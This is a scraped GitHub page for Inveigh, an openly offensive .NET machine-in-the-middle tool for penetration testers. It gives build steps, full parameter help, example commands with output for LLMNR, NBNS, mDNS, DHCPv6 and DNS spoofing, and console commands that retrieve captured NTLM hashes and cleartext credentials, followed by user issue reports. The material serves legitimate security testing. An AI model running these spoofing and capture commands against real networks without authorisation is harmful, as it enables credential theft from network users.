kevin-robertson / inveigh Goto Github PK

.NET IPv4/IPv6 machine-in-the-middle tool for penetration testers

License: BSD 3-Clause "New" or "Revised" License

PowerShell 49.01% C# 50.99%

inveigh's Introduction

Inveigh

Inveigh is a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool for penetration testers. This repo contains the primary C# version as well as the legacy PowerShell version.

Overview

Inveigh conducts spoofing attacks and hash/credential captures through both packet sniffing and protocol specific listeners/sockets. The packet sniffing method, which was the basis for the original Powershell version of this tool, has the following advantages:

SMB NTLM challenge/response captures over the Window's SMB service
Fewer visible port binds on the host system

The primary disadvantage is the required elevated access.

On current versions of Windows, the default running UDP services allow port reuse. Therefore, packet sniffing no longer provides an advantage for getting around in-use UDP ports. Inveigh's UDP listeners are all configured to take advantage of port reuse.

Version Descriptions

PowerShell Inveigh - original version developed over many years. For now at least, this version (1.506) will go without additional updates. Documentation can be found here.
C# Inveigh (aka InveighZero) - original C# POC code combined with a C# port of most of the Powershell version's code. This version has now been rebuilt for C# and is taking over as the primary version.

Features

The C# version of Inveigh contains attacks for the following protocols:

LLMNR [packet sniffer | listener]
DNS [packet sniffer | listener]
mDNS [packet sniffer | listener]
NBNS [packet sniffer | listener]
DHCPv6 [packet sniffer | listener]
ICMPv6 [privileged raw socket]
HTTP [listener]
HTTPS [listener]
SMB [packet sniffer | listener]
LDAP [listener]
WebDAV [listener]
Proxy Auth [listener]

Inveigh works with both IPv4 and IPv6 in cases where support for both is provided by the underlying protocol.

Cross-Platform Support

Inveigh's SDK style project file is setup for .NET 3.5, 4.6.2, and 6.0 with 6.0 being the version that also works with Linux and macOS.

<TargetFrameworks>net35;net62;net6.0</TargetFrameworks>

Known Issues

The packet sniffer is available only on Windows due to differences in the raw socket setups. When compiled for either Linux or macOS, the packet sniffer will just be disabled. Instead, Inveigh's SMB listener can be used if port 445 is open.
macOS requires that routes are available for joining multicast groups. In my testing, I've had to add routes for DHCPv6 multicast in order to carry out that attack on this platform.
sudo route -nv add -net ff02::1:2 -interface en0

Execution

dotnet Inveigh.dll

Linux/macOS Platform Targeted Builds

With .NET 6.0 installed on target system
dotnet publish -r linux-x64 -f net6.0 -p:AssemblyName=inveigh
dotnet publish -r osx-x64 -f net6.0 -p:AssemblyName=inveigh
Without .NET 6.0 installed on target system
dotnet publish --self-contained=true -p:PublishSingleFile=true -r linux-x64 -f net6.0 -p:AssemblyName=inveigh
dotnet publish --self-contained=true -p:PublishSingleFile=true -r osx-x64 -f net6.0 -p:AssemblyName=inveigh

Usage

Default parameter values are located at the beginning of Program.cs. I recommend reviewing and setting everything to fit your needs before compile. All enable/disable parameters can be set with Y/N values.

    //begin parameters - set defaults as needed before compile
    public static string argCert = "MIIKaQIBAzCCC..."
    public static string argCertPassword = "password";
    public static string argChallenge = "";
    public static string argConsole = "5";
    public static string argConsoleLimit = "-1";
    public static string argConsoleStatus = "0";
    public static string argConsoleUnique = "Y";
    public static string argDHCPv6 = "N";
    public static string argDHCPv6TTL = "30";
    public static string argDNS = "Y";
    ...
    //end parameters

Parameter Help

.\Inveigh.exe -?

Control:

  -Inspect        Default=Disabled: (Y/N) inspect traffic only.

  -IPv4           Default=Enabled: (Y/N) IPv4 spoofing/capture.

  -IPv6           Default=Enabled: (Y/N) IPv6 spoofing/capture.

  -RunCount       Default=Unlimited: Number of NetNTLM captures to perform before auto-exiting.

  -RunTime        Default=Unlimited: Run time duration in minutes.


Output:

  -Console        Default=5: Set the level for console output. (0=none, 1=only captures/spoofs, 2=no disabled, no informational, 3=no disabled, no filtered, 4=no disabled, 5=all)  

  -ConsoleLimit   Default=Unlimited: Limit to queued console entries.

  -ConsoleStatus  Default=Disabled: Interval in minutes for auto-displaying capture details.

  -ConsoleUnique  Default=Enabled: (Y/N) displaying only unique (user and system combination) hashes at time of capture.

  -FileDirectory  Default=Working Directory: Valid path to an output directory for enabled file output.

  -FileOutput     Default=Disabled: (Y/N) real time file output.

  -FilePrefix     Default=Inveigh: Prefix for all output files.

  -FileUnique     Default=Enabled: (Y/N) outputting only unique (user and system combination) hashes.

  -LogOutput      Default=Disabled: (Y/N) outputting log entries.


Spoofers:

  -DHCPV6         Default=Disabled: (Y/N) DHCPv6 spoofing.

  -DHCPv6TTL      Default=300: Lease lifetime in seconds.

  -DNS            Default=Enabled: (Y/N) DNS spoofing.

  -DNSHost        Fully qualified hostname to use SOA/SRV responses.

  -DNSSRV         Default=LDAP: Comma separated list of SRV request services to answer.

  -DNSSuffix      DNS search suffix to include in DHCPv6/ICMPv6 responses.

  -DNSTTL         Default=30: DNS TTL in seconds.

  -DNSTYPES       Default=A: (A, AAAA, SOA, SRV) Comma separated list of DNS types to spoof.

  -ICMPv6         Default=Enabled: (Y/N) sending ICMPv6 router advertisements.

  -ICMPv6Interval Default=200: ICMPv6 RA interval in seconds.
  
  -ICMPv6TTL	  Default=300: ICMPv6 TTL in seconds.

  -IgnoreDomains  Default=None: Comma separated list of domains to ignore when spoofing.



  -IgnoreIPs      Default=Local: Comma separated list of source IP addresses to ignore when spoofing.

  -IgnoreMACs     Default=Local: Comma separated list of MAC addresses to ignore when DHCPv6 spoofing.
  
  -IgnoreQueries  Default=None: Comma separated list of name queries to ignore when spoofing.

  -Local          Default=Disabled: (Y/N) performing spoofing attacks against the host system.

  -LLMNR          Default=Enabled: (Y/N) LLMNR spoofing.

  -LLMNRTTL       Default=30: LLMNR TTL in seconds.

  -MAC            Local MAC address for DHCPv6.

  -MDNS           Default=Enabled: (Y/N) mDNS spoofing.

  -MDNSQuestions  Default=QU,QM: Comma separated list of question types to spoof. (QU,QM)

  -MDNSTTL        Default=120: mDNS TTL in seconds.

  -MDNSTypes      Default=A: Comma separated list of mDNS record types to spoof. (A,AAAA,ANY)

  -MDNSUnicast    Default=Enabled: (Y/N) sending a unicast only response to a QM request.

  -NBNS           Default=Disabled: (Y/N) NBNS spoofing.

  -NBNSTTL        Default=165: NBNS TTL in seconds.

  -NBNSTypes      Default=00,20: Comma separated list of NBNS types to spoof. (00,03,20,1B)

  -ReplyToDomains Default=All: Comma separated list of domains to respond to when spoofing.

  -ReplyToIPs     Default=All: Comma separated list of source IP addresses to respond to when spoofing.

  -ReplyToMACs    Default=All: Comma separated list of MAC addresses to respond to when DHCPv6 spoofing.
  
  -ReplyToQueries Default=All: Comma separated list of name queries to respond to when spoofing.

  -SpooferIP      Default=Autoassign: IP address included in spoofing responses.

  -SpooferIPv6    Default=Autoassign: IPv6 address included in spoofing responses.

  -Repeat         Default=Enabled: (Y/N) repeated spoofing attacks against a system after NetNTLM capture.


Capture:

  -Cert           Base64 certificate for TLS.

  -CertPassword   Base64 certificate password for TLS.

  -Challenge      Default=Random per request: 16 character hex NetNTLM challenge for use with the TCP listeners.

  -HTTP           Default=Enabled: (Y/N) HTTP listener.

  -HTTPAuth       Default=NTLM: (Anonymous/Basic/NTLM) HTTP/HTTPS listener authentication.

  -HTTPPorts      Default=80: Comma seperated list of TCP ports for the HTTP listener.

  -HTTPRealm      Default=ADFS: Basic authentication realm.

  -HTTPResponse   Content to serve as the default HTTP/HTTPS/Proxy response.

  -HTTPS          Default=Enabled: (Y/N) HTTPS listener.

  -HTTPSPorts     Default=443: Comma separated list of TCP ports for the HTTPS listener.

  -IgnoreAgents   Default=Firefox: Comma separated list of HTTP user agents to ignore with wpad and proxy auth.

  -LDAP           Default=Enabled: (Y/N) LDAP listener.

  -LDAPPorts      Default=389: Comma separated list of TCP ports for the LDAP listener.

  -ListenerIP     Default=Any: IP address for all listeners.

  -ListenerIPv6   Default=Any: IPv6 address for all listeners.

  -MachineAccount Default=Enabled: (Y/N) machine account NetNTLM captures.

  -Proxy          Default=Disabled: (Y/N) proxy listener authentication captures.

  -ProxyAuth      Default=NTLM: (Basic/NTLM) Proxy authentication.

  -ProxyPort      Default=8492: Port for the proxy listener.

  -SMB            Default=Enabled: (Y/N) SMB sniffer/listener.

  -SMBPorts       Default=445: Port for the SMB listener.

  -SnifferIP      Default=Autoassign: IP address included in spoofing responses.

  -SnifferIPv6    Default=Autoassign: IPv6 address included in spoofing responses.

  -WebDAV         Default=Enabled: (Y/N) serving WebDAV over HTTP/HTTPS listener.

  -WebDAVAuth     Default=NTLM: (Anonymous/Basic/NTLM) WebDAV authentication.

  -WPADAuth       Default=Enabled: (Y/N) authentication type for wpad.dat requests. (Anonymous/Basic/NTLM)

  -WPADResponse   Default=Autogenerated: Contents of wpad.dat responses.

Default (autodetect local IPs)

.\Inveigh.exe
[*] Inveigh 2.0 [Started 2021-06-15T00:08:37 | PID 12588]
[+] Packet Sniffer Addresses [IP 10.10.2.111 | IPv6 fe80::3d3b:b73c:c43e:ed4e%2]
[+] Listener Addresses [IP 0.0.0.0 | IPv6 ::]
[+] Spoofer Reply Addresses [IP 10.10.2.111 | IPv6 fe80::3d3b:b73c:c43e:ed4e%2]
[+] Spoofer Options [Repeat Enabled | Local Attacks Disabled]
[-] DHCPv6
[+] DNS Packet Sniffer [Type A]
[-] ICMPv6
[+] LLMNR Packet Sniffer [Type A]
[-] MDNS
[-] NBNS
[+] HTTP Listener [HTTPAuth NTLM | WPADAuth NTLM | Port 80]
[-] HTTPS
[+] WebDAV [WebDAVAuth NTLM]
[-] Proxy
[+] LDAP Listener [Port 389]
[+] SMB Packet Sniffer [Port 445]
[+] File Output [C:\Users\dev\source\repos\Inveigh\Inveigh\bin\Debug\net35]
[+] Previous Session Files [Imported]
[*] Press ESC to enter/exit interactive console

Listener Only Mode (disabled packet sniffer)

.\Inveigh.exe -sniffer n
[*] Inveigh 2.0 [Started 2021-06-14T10:48:16 | PID 20368]
[-] Packet Sniffer
[+] Listener Addresses [IP 0.0.0.0 | IPv6 ::]
[+] Spoofer Reply Addresses [IP 10.10.2.111 | IPv6 fe80::3d3b:b73c:c43e:ed4e%2]
[+] Spoofer Options [Repeat Enabled | Local Attacks Disabled]
[-] DHCPv6
[+] DNS Listener [Type A]
[-] ICMPv6
[+] LLMNR Listener [Type A]
[-] MDNS
[-] NBNS
[+] HTTP Listener [HTTPAuth NTLM | WPADAuth NTLM | Port 80]
[-] HTTPS
[+] WebDAV [WebDAVAuth NTLM]
[-] Proxy
[+] LDAP Listener [Port 389]
[+] SMB Listener [Port 445]
[+] File Output [C:\Users\dev\source\repos\InveighZero\Inveigh\bin\Debug\net35]
[+] Previous Session Files [Imported]
[*] Press ESC to enter/exit interactive console
[!] Failed to start SMB listener on port 445, check IP and port usage.
[!] Failed to start SMB listener on port 445, check IP and port usage.

Note, with the packet sniffer disabled, Inveigh will attempt to start SMB listeners for IPv4 and IPv6. On most windows systems, port 445 will already be in use. Either ignore error or add -smb n.

DHCPv6

Start DHCPv6 spoofer and IPv6 DNS spoofer. Note, DNS is on by default.

.\Inveigh.exe -dhcpv6 y
...
[+] DHCPv6 Listener [MAC 52:54:00:FF:B5:53]
[+] DNS Listener [Type A]
...
[+] [23:03:06] DHCPv6 [solicitation] from fe80::bd92:a800:60d0:8deb%2(test-wks1.lab.inveigh.org) [response sent]
[+] [23:03:06] DHCPv6 [fe80::1348:1] advertised to [00:0C:29:F0:6E:16]
[+] [23:03:06] DHCPv6 [request] from fe80::bd92:a800:60d0:8deb%2(test-wks1.lab.inveigh.org) [response sent]
[+] [23:03:06] DHCPv6 [fe80::1348:1] leased to [00:0C:29:F0:6E:16]

Start DHCPv6 spoofer and spoof DNS requests for internal domain only.

.\Inveigh.exe -dhcpv6 y -replytodomains lab.inveigh.org
...
[+] DHCPv6 Listener [MAC 52:54:00:FF:B5:53]
[+] DNS Listener [Type A]
...
[-] [23:10:30] DNS(A) request [test.inveigh.org] from fe80::6142:1%2 [domain ignored]
[+] [23:10:33] DNS(A) request [wpad.lab.inveigh.org] from fe80::6142:1%2 [response sent]

Start DHCPv6 spoofer and also send out ICMPv6 RA packets.

.\Inveigh.exe -dhcpv6 y -icmpv6 y
...
[+] DHCPv6 Listener [MAC 52:54:00:FF:B5:53]
[+] DNS Listener [Type A]
[+] ICMPv6 Router Advertisement [Interval 200 Seconds]
...
[+] [23:12:04] ICMPv6 router advertisment sent to [ff02::1]

Start DHCPv6 spoofer and answer requests from the local host.

.\Inveigh.exe -dhcpv6 y -local y
...
[+] Spoofer Options [Repeat Enabled | Local Attacks Enabled]
[+] DHCPv6 Listener [MAC 52:54:00:FF:B5:53]

DNS

Spoof SRV requests in addition to A.

.\Inveigh.exe -dnstypes A,SRV -dnshost fake.lab.inveigh.org
...
[+] DNS Listener [Types A:SRV]
...
[+] [23:21:05] DNS(SRV) request [_ldap._tcp.dc._msdcs.lab.inveigh.org] from fe80::242d:f99e:7534:b46f%2 [response sent]

ICMPv6

Send ICMPv6 packets to inject a secondary IPv6 DNS server on local subnet systems.

.\Inveigh.exe -icmpv6 y
...
[+] ICMPv6 Router Advertisement [Option DNS | Interval 200 Seconds]
...
[+] [23:35:46] ICMPv6 router advertisement with DNSv6 sent to [ff02::1]

Send ICMPv6 packets to inject an additional DNS search suffix on local subnet systems.

.\Inveigh.exe -icmpv6 y -dnssuffix inveigh.net
...
[+] ICMPv6 Router Advertisement [Option DNS Suffix | Interval 200 Seconds]
...
[+] [23:41:17] ICMPv6 router advertisement with DNS Suffix sent to [ff02::1]

LLMNR

Spoof AAAA requests instead of A.

.\Inveigh.exe -llmnrtypes AAAA
...
[+] LLMNR Listener [Type AAAA]
...
[-] [23:23:38] LLMNR(A) request [test] from fe80::bd92:a800:60d0:8deb%2 [type ignored]
[-] [23:23:38] LLMNR(A) request [test] from 10.10.2.201 [type ignored]
[+] [23:23:38] LLMNR(AAAA) request [test] from 10.10.2.201 [response sent]
[+] [23:23:38] LLMNR(AAAA) request [test] from fe80::bd92:a800:60d0:8deb%2 [response sent]

mDNS

Start mDNS spoofer and send unicast responses to QM requests.

.\Inveigh.exe -mdns y
...
[+] MDNS Listener [Questions QU:QM | Type A]
...
[+] [23:25:58] mDNS(QM)(A) request [test.local] from fe80::bd92:a800:60d0:8deb%2 [response sent]
[+] [23:25:58] mDNS(QM)(A) request [test.local] from 10.10.2.201 [response sent]
[-] [23:25:58] mDNS(QM)(AAAA) request [test.local] from 10.10.2.201 [type ignored]
[-] [23:25:58] mDNS(QM)(AAAA) request [test.local] from fe80::bd92:a800:60d0:8deb%2 [type ignored]

Start mDNS spoofer and send multicast responses to QM requests.

.\Inveigh.exe -mdns y -mdnsunicast n
...
[+] MDNS Listener [Questions QU:QM | Type A]
...
[+] [23:28:26] mDNS(QM)(A) request [test.local] from 10.10.2.201 [response sent]
[+] [23:28:26] mDNS(QM)(A) request [test.local] from fe80::bd92:a800:60d0:8deb%2 [response sent]

NBNS

Start NBNS spoofer

.\Inveigh.exe -nbns y
...
[+] NBNS Listener [Types 00:20]
...
[+] [23:33:09] NBNS(00) request [TEST] from 10.10.2.201 [response sent]

HTTP

Start HTTP listener on port 80 (enabled by default)

.\Inveigh.exe 
...
[+] HTTP Listener [HTTPAuth NTLM | WPADAuth NTLM | Port 80]
...

Start HTTP listeners on multiple ports

.\Inveigh.exe -httpports 80,8080
...
[+] HTTP Listener [HTTPAuth NTLM | WPADAuth NTLM | Ports 80:8080]
...

HTTPS

Start HTTPS listener on port 443 with Inveigh's default cert

.\Inveigh.exe -https y
...
[+] HTTPS Listener [HTTPAuth NTLM | WPADAuth NTLM | Port 443]
...

SMB

Start SMB packet sniffer (enabled by default)

.\Inveigh.exe
...
[+] SMB Packet Sniffer [Port 445]
...

Start SMB listener on port 445

.\Inveigh.exe -sniffer n
...
[+] SMB Listener [Port 445]
...

LDAP

Start LDAP listener on port 389

.\Inveigh.exe
...
[+] LDAP Listener [Port 389]
...

WebDAV

Start the HTTP listener with WebDAV support (enabled by default)

.\Inveigh.exe
...
[+] WebDAV [WebDAVAuth NTLM]
...

Proxy Auth

Enable proxy auth capture on port 8492

.\Inveigh.exe -proxy y
...
[+] Proxy Listener [ProxyAuth NTLM | Port 8492]
...

Console

Inveigh contains a console that is accessible while the tool is running (hit escape to enter and exit). The console provides easy access to captured credentials/hashes and other various information. The console's prompt provides real-time updates for cleartext, NTLMv1, and NTLMv2 captue counts in the format of unique:total. Note, the console may be inaccessible when running through C2.

Interactive Console Help - enter ? or HELP

=============================================== Inveigh Console Commands ===============================================

Command                           Description
========================================================================================================================
GET CONSOLE                     | get queued console output
GET DHCPv6Leases                | get DHCPv6 assigned IPv6 addresses
GET LOG                         | get log entries; add search string to filter results
GET NTLMV1                      | get captured NTLMv1 hashes; add search string to filter results
GET NTLMV2                      | get captured NTLMv2 hashes; add search string to filter results
GET NTLMV1UNIQUE                | get one captured NTLMv1 hash per user; add search string to filter results
GET NTLMV2UNIQUE                | get one captured NTLMv2 hash per user; add search string to filter results
GET NTLMV1USERNAMES             | get usernames and source IPs/hostnames for captured NTLMv1 hashes
GET NTLMV2USERNAMES             | get usernames and source IPs/hostnames for captured NTLMv2 hashes
GET CLEARTEXT                   | get captured cleartext credentials
GET CLEARTEXTUNIQUE             | get unique captured cleartext credentials
GET REPLYTODOMAINS              | get ReplyToDomains parameter startup values
GET REPLYTOIPS                  | get ReplyToIPs parameter startup values
GET REPLYTOMACS                 | get ReplyToMACs parameter startup values
GET REPLYTOQUERIES              | get ReplyToQueries parameter startup values
GET IGNOREDOMAINS               | get IgnoreDomains parameter startup values
GET IGNOREIPS                   | get IgnoreIPs parameter startup values
GET IGNOREMACS                  | get IgnoreMACs parameter startup values
GET IGNOREQUERIES               | get IgnoreQueries parameter startup values
SET CONSOLE                     | set Console parameter value
HISTORY                         | get command history
RESUME                          | resume real time console output
STOP                            | stop Inveigh

Interactive Console Prompt

The console prompt contains real time capture counts.

C(0:0) NTLMv1(0:0) NTLMv2(0:0)>

Cleartext(unique:total) NTLMv1(unique:total) NTLMv2(unique:total)

Quiddity

The protocol library used by Inveigh is located here.

Special Thanks

Responder - https://github.com/lgandx/Responder
Impacket - https://github.com/SecureAuthCorp/impacket
mitm6 - https://github.com/fox-it/mitm6

inveigh's People

Contributors

Stargazers

Watchers

Forkers

akiraaisha marksee cephurs lucabongiorni detrojones breakersall johnjohnsp1 jbarcia lockfale dipsec zigitax rkornmeyer caoimhinp blackbox-csp xorrior uippet superuser5 soulless313 cn33liz harmj0y sixdub wflk jajp777 fork42541 carnal0wnage vysecurity eniac888 youmuyou zhuyue1314 phishing-factory deed02392 darthra n0clues r13mann snollyg0st3r uppentest techbytom panix187 quikilr nullbind meatballs1 joncave ashr modulexcite tuian room362 hmsh00d mrlobic jryanwall opexxx 0v3rm1nd-dr4g0n solertis olivierh59500 xiaohen jackbro m4l0y kaicastledine techlord-rce chewvala jack51706 l34rn socmap moriarty2016 gfxox3jj3cqr0rmy pyq881120 av1080p rhmoult c0de3 y0d4a hack404-007 diudiuda awesome-security s3cur3th1ssh1t 0thm4n3 technotrev hackmycontrolsystem encapsulate nan3r the-factory icon0clast methos2016 0x09al libertyunix s4yhell0 sh4d0x00 h0k5 jaboko heikipikker firefalc0n wilsonleeee poppopjmp grukz thatguyz kirus22 ofer100 j9t5k8bx1ny4h2pr fogsec capitaogancho mabangde mehrdad-shokri

inveigh's Issues

Defender marks it as "VirTool:MSIL/Denigrate.B!MTB"

I had just downloaded the latest version and saw a virus alert is this a False Positive?

Images for README

Is inveigh mitigated when using Constrained Language Mode?

Hi @Kevin-Robertson
Do you by any chance remember is Inveigh is affected/mitigated when Constrained Language Mode is configured?

Thank you in advance

NTLMv1 challenge/response

Hello,

So far I can capture NTLMv1 challenge/response from HTTP authentication.

What can be done with this challenge/response apart from brute forcing raw password from it ? It seems it can't be used with Invoke-InveighRelay as it only supports NTLMv2 (but still is able to capture NTLMv1 challenge/response).

Thx,
Arno

error building Inveigh 2.0

Hi,
I've tried on my VM and on Appveyor and I get the same issue :

Any ideas ?

Many thanks, and looking fwd to test it.

C:\Program Files\dotnet\sdk\5.0.301\Sdks\Microsoft.NET.Sdk\targets\Microsoft.PackageDependencyResolution.targets(241,5): error NETSDK1004: Assets file 'C:\projects\inveigh\Inveigh\obj\project.assets.json' not found. Run a NuGet package restore to generate this file. [C:\projects\inveigh\Inveigh\Inveigh.csproj]
C:\Program Files\dotnet\sdk\5.0.301\Sdks\Microsoft.NET.Sdk\targets\Microsoft.PackageDependencyResolution.targets(241,5): error NETSDK1004: Assets file 'C:\projects\inveigh\Inveigh\obj\project.assets.json' not found. Run a NuGet package restore to generate this file. [C:\projects\inveigh\Inveigh\Inveigh.csproj]
C:\Program Files\dotnet\sdk\5.0.301\Sdks\Microsoft.NET.Sdk\targets\Microsoft.PackageDependencyResolution.targets(241,5): error NETSDK1004: Assets file 'C:\projects\inveigh\Inveigh\obj\project.assets.json' not found. Run a NuGet package restore to generate this file. [C:\projects\inveigh\Inveigh\Inveigh.csproj]

Setting -EvadeRG N has no effect

Using the command line options

PS C:\> Invoke-Inveigh -ConsoleOutput Y -NBNS Y -mDNS Y -HTTPS Y -Proxy Y -NBNSTypes 00,20,03,1B -MachineAccounts Y -EvadeRG N

Inveigh will still drop requests

[+] [2019-05-03T14:50:02] NBNS request for ASDF<42-4B> received from 10.20.43.149 [NBNS type disabled]
[+] [2019-05-03T14:50:03] NBNS request for ASDF<42-4B> received from 10.20.43.149 [NBNS type disabled]
[+] [2019-05-03T14:50:10] LLMNR request for ASDF received from 10.20.43.149 [response sent]
WARNING: [!] [2019-05-03T14:50:10] NBNS request for *              <00> received from 10.20.43.149 [possible ResponderGuard request ignored]

Incorrect hash length for netntlmv2 captured hash

Hello Kevin,

I've obtained several NetNTLM v2 hashes using your tool but hashcat is throwing an error with the hash length (type 5600: NetNTLMv2)

Hashfile 'netntlmv2.lst' on line 1 (-- redacted ---): Salt-length exception

The same error for all hashes.

Checking the format against the hashcat examples I've accomplished an inusual length of 32 characters for the captured hash.

Any idea or hint?

Thanks in advance!

Feature Request LDAP Queries

It would be nice to have the ability with Inviegh Relay to query AD like NTLMRelayX does for LAPS passwords and such

Feature Request - WebDAV Support

As discussed here: NetSPI/PowerUpSQL#54

It would be nice to have support for WebDAV in the cases where this is possible.

SMB challenge/response never intercepted

Hello, and thank you for this great tool.

I'm facing a problem when trying to MITM the LLMNR requests through Inveigh. I use it with default settings, but what it happens at testing:

[+] [2018-10-29T22:21:53] LLMNR request for ppppppp received from 192.168.0.10 [Response Sent]
[+] [2018-10-29T22:21:53] LLMNR request for ppppppp received from 192.168.0.10 [Response Sent]
............

And I never receive the SMB challenge. Is that problem has something to do with firewall? I use Inveigh in elevated privileges.

Unhandled Exception: System.ArgumentException: Invalid Parameter "LISTENERIP"

I want to set a specific IP to listen on.
After building Inveigh, I notice that the "-ListenerIP" option doesn't seem to be recognised.

I read in the readme:

" -ListenerIP Default=Any: IP address for all listeners."

C:\ .\Inveigh.exe -ListenerIP "192.168.1.1"

Unhandled Exception: System.ArgumentException: Invalid Parameter
Parameter name: -LISTENERIP
at Inveigh.Program.Main(String[] args)

relay to multiple targets?

Hi Kevin

Just wondering, I see you can relay to multiple targets providing a comma separated list, did you ever implement a read from a file instead?

Stuck on Performing DNS Lookups

Invoke-InveighRelay was working perfectly but now gets stuck on 'Performing DNS lookups on any hostname targets.'. There are no hostname targets

Exception Calling "Write" and "Read" After Successful Auth due to Conenction being Forcibly Closed By Remote Host

Above is the screenshot of what happens when I run the identical commands that are in the screenshot at the bottom of the wiki (https://github.com/Kevin-Robertson/Inveigh/wiki). The IP and command is changed for the appropriate target and a basic New-Item powershell command for testing.

The read issue started when I tried to do it from the domain admin account instead of the local admin. Ive disabled firewalls on both systems, disabled SMB signing, and even tried using Inveigh 1.4 because the machines are a little out of date, I might even try 1.3 if I cant figure this out but I dont think thats the issue.

If I can provide any more information please let me know! Thanks in advance to anyone who can give me a point in the right direction, im starting to feel like ive hit a brick wall.

Unprivileged spoofing with different IP address

Hi,

I tried to spoof LLMNR traffic using the C# Version of Inveigh and redirect the traffic to a Kali machine as an unprivileged user. As the sniffer is described as requiring privileges, I disabled it. When I do this Inveigh seems to always use the IP of the local Windows machine for spoofing.

I think the issue is in the following code from Support/Arguments.cs (line 249-262).

            if (!string.Equals(Program.argListenerIP, "0.0.0.0") && string.IsNullOrEmpty(Program.argSpooferIP))
                {
                    Program.argSpooferIP = Program.argListenerIP;
                }
                else
                {
                    Program.argSpooferIP = GetLocalIPAddress("IPv4");

                    if (string.IsNullOrEmpty(Program.argSpooferIP))
                    {
                        Program.enabledIPv4 = false;
                    }

                }

This code is entered, when the sniffer is disabled and seems to always set the SpooferIP to the LocalIPAddress. I was able to get my use case to work by commenting out Program.argSpooferIP = GetLocalIPAddress("IPv4");. Could you have a look at the code and possibly insert an additional statement here, that handles the case where the user supplies a custom SpooferIP as an argument?

Best regards

Errors on invoke-inveigh

There are bunch of error when I try run this, please assist me, I'm admin on the machine

Invoke-Inveigh -ConsoleOutput Medium -ConsoleUnique N -NBNS Y -mDNS Y -FileOutput Y -FileOutputDirectory C:

Bug: ADIDNS doesn't work for the System partition.

Hi,

The ADIDNS functionality is absolutely awesome and works great when the DNS zone is stored under DomainDNSZones.
But it doesn't work when the zone is in the System partition.
Some of the functions just don't have 'System' under the the ValidateSet array:

[parameter(Mandatory=$false)][ValidateSet("DomainDNSZones","ForestDNSZones")][String]$Partition = "DomainDNSZones",

But even after fixing it, I still received the following error, and the DNS node was not created:

WARNING: [!] [2021-06-02T10:18:48] Exception calling "SendRequest" with "1" argument(s): "The object does not exist."
$connection.SendRequest($request) > $null

In Powermad, the system partition functionality works correctly.

Many thanks and kudos for these amazing tools (and for the research of ADIDNS risks)!
Haim.

Shows "HTTP Capture Disabled Due To In Use Port 80" when actually listening on Port 8081

Good day,

As titled, Invoke-Inveigh shows port 80 is listening while there is another service listening on port 0.0.0.0:8081. It happens to be lines on netstat that matches "0.0.0.0:8081" with searchstring "0.0.0.0:80". Same issue potentially appears in other netstat commands in the same project.

On line 555 of Inveigh.ps1
$HTTP_port_check = netstat -anp TCP | findstr 0.0.0.0:80

Suggest to update as below to grep the space at the end with findstr:
netstat -anp TCP | findstr LISTENING | findstr /C:":80 "
or
netstat -anp TCP | findstr LISTENING | findstr /C:"0.0.0.0:80 "

Thanks
Cyril

Cannot build project

Hi,
This maybe something obvious, but tried to build the latest version and im getting the same message for all three .net versions.

The only argument that gives me the correct output is the help '-?'

Using VS2019. Build comes back clean. Tried both Debug and Release.

Win10 21H1 OSBuild 19043.1320

Any suggestions appreciated.

Object reference not set to an instance of an object.

SMB to SMB Relay

Hi,

Thank you for creating such a tool!

While using InveighRelay, I noticed that it doesn't accept SMB1/2 to SMB1/2 Relay. From the description, InveighRelay does "NTLMv1/NTLMv2 HTTP/HTTPS/Proxy to SMB1/SMB2".

The idea is similar this article using Metasploit module (SMB_Relay).

https://pen-testing.sans.org/blog/2013/04/25/smb-relay-demystified-and-ntlmv2-pwnage-with-python

-AJ-

Error specifying more than on NBNSType with powershell script

With build 1459e04 running on Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 with powershell version:

PS C:\Windows\system32> $PSVersionTable.PSVersion

Major  Minor  Build  Revision
-----  -----  -----  --------
3      0      -1     -1

When specifying more than one NBNSType, as with the following oneliner:

powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1'); Invoke-Inveigh -ConsoleOutput Y -FileOutput Y -LLMNR Y -mDNS Y -NBNS Y -NBNSTypes 00,03,20""

I consistently receive an error:

Invoke-Inveigh : Cannot validate argument on parameter 'NBNSTypes'. The argument "0" does not belong to the set "00,03,20,1B,1C,1D,1E" specified by the ValidateSet attribute. Supply an argument that
is in the set and then try the command again.
At line:1 char:210
+ ... S Y -NBNSTypes 00,20
+                    ~~~~~
    + CategoryInfo          : InvalidData: (:) [Invoke-Inveigh], ParameterBindingValidationException
    + FullyQualifiedErrorId : ParameterArgumentValidationError,Invoke-Inveigh

It will always work with a single specified nbnstype. I'vet tried wrapping the nbnstype list in quotes but it does not seem to make a difference.

NBNS type support 1C

Any plans to support NBMS 1C type?

Thanks

typo in readme example

Invoke-InveighUnprivileged -ConsoleOutpuy Y -FileOutput Y -RunTime 30

"Outpuy"

Not a big deal, just thought I'd mention

Error running Inveigh.exe 4.5

I'm not sure what might have gone wrong here:

Unhandled Exception: System.InvalidOperationException: Not listening. You must call the Start() method before calling this method.
   at System.Net.Sockets.TcpListener.BeginAcceptTcpClient(AsyncCallback callback, Object state)
   at Inveigh.HTTPListener.Start(IPAddress ipAddress, Int32 port, String type)
   at Inveigh.Control.<>c__DisplayClass3_11.<StartThreads>b__14()
   at System.Threading.ExecutionContext.RunInternal(ExecutionContext executionContext, ContextCallback callback, Object state, Boolean preserveSyncCtx)
   at System.Threading.ExecutionContext.Run(ExecutionContext executionContext, ContextCallback callback, Object state, Boolean preserveSyncCtx)
   at System.Threading.ExecutionContext.Run(ExecutionContext executionContext, ContextCallback callback, Object state)
   at System.Threading.ThreadHelper.ThreadStart()

Unhandled Exception: System.InvalidOperationException: Not listening. You must call the Start() method before calling this method.
   at System.Net.Sockets.TcpListener.BeginAcceptTcpClient(AsyncCallback callback, Object state)
   at Inveigh.HTTPListener.Start(IPAddress ipAddress, Int32 port, String type)
   at Inveigh.Control.<>c__DisplayClass3_20.<StartThreads>b__19()
   at System.Threading.ExecutionContext.RunInternal(ExecutionContext executionContext, ContextCallback callback, Object state, Boolean preserveSyncCtx)
   at System.Threading.ExecutionContext.Run(ExecutionContext executionContext, ContextCallback callback, Object state, Boolean preserveSyncCtx)
   at System.Threading.ExecutionContext.Run(ExecutionContext executionContext, ContextCallback callback, Object state)
   at System.Threading.ThreadHelper.ThreadStart()

Packet sniffing error detected - System.ArgumentException

Hello,
I'm running the latest version on Windows 7 x64, and am getting this error:

Running with
